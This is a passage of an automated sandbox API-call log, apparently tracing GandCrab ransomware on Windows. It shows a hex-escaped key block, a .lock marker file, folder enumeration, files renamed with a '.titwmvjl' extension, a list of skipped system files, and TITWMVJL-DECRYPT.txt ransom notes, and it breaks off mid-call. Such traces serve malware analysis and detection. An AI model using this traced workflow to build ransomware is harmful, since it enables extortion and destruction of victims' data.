b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.135] WriteFile (in: hFile=0x2e4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0079.136] CloseHandle (hObject=0x2e4) returned 1 [0079.136] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.136] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.137] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x18, wMilliseconds=0x1c4)) [0079.137] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.137] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.137] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.137] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned 123 [0079.137] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e4 [0079.138] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.138] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\") returned 99 [0079.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0079.138] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x503938 [0079.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.138] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.139] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.139] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.139] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.139] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.139] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock" [0079.139] lstrlenW (lpString=".titwmvjl") returned 9 [0079.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned 123 [0079.139] VirtualAlloc (lpAddress=0x0, dwSize=0x136, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.139] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 132 [0079.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\d2ca4a09d2ca4deb61a.lock") returned 123 [0079.139] lstrlenW (lpString=".lock") returned 5 [0079.139] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.140] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.140] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.140] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.140] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.140] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.140] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.140] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt" [0079.140] lstrlenW (lpString=".titwmvjl") returned 9 [0079.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 119 [0079.140] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.140] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 128 [0079.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 119 [0079.140] lstrlenW (lpString=".txt") returned 4 [0079.140] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.141] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.141] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.141] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 119 [0079.141] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\TITWMVJL-DECRYPT.txt") returned 119 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.141] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.141] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.141] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0079.142] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0079.142] CloseHandle (hObject=0x2e4) returned 1 [0079.142] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.142] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.142] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock" [0079.143] lstrlenW (lpString=".titwmvjl") returned 9 [0079.143] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned 118 [0079.143] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.143] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 127 [0079.143] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a09d2ca4deb61a.lock") returned 118 [0079.143] lstrlenW (lpString=".lock") returned 5 [0079.143] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.143] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.143] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.143] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.143] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.143] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.143] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.144] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt" [0079.144] lstrlenW (lpString=".titwmvjl") returned 9 [0079.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 114 [0079.144] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.144] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 123 [0079.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 114 [0079.144] lstrlenW (lpString=".txt") returned 4 [0079.144] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.144] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.144] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.144] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 114 [0079.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\TITWMVJL-DECRYPT.txt") returned 114 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.144] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.144] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.145] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0079.145] FindClose (in: hFindFile=0x503238 | out: hFindFile=0x503238) returned 1 [0079.146] CloseHandle (hObject=0x2dc) returned 1 [0079.146] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0079.146] lstrcmpW (lpString1="SmartArt Graphics", lpString2=".") returned 1 [0079.146] lstrcmpW (lpString1="SmartArt Graphics", lpString2="..") returned 1 [0079.146] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="SmartArt Graphics" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics" [0079.146] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\" [0079.146] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.146] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.146] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.147] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.147] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.147] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.147] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.147] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.147] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\\\TITWMVJL-DECRYPT.txt") returned 117 [0079.147] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0079.148] lstrlenW 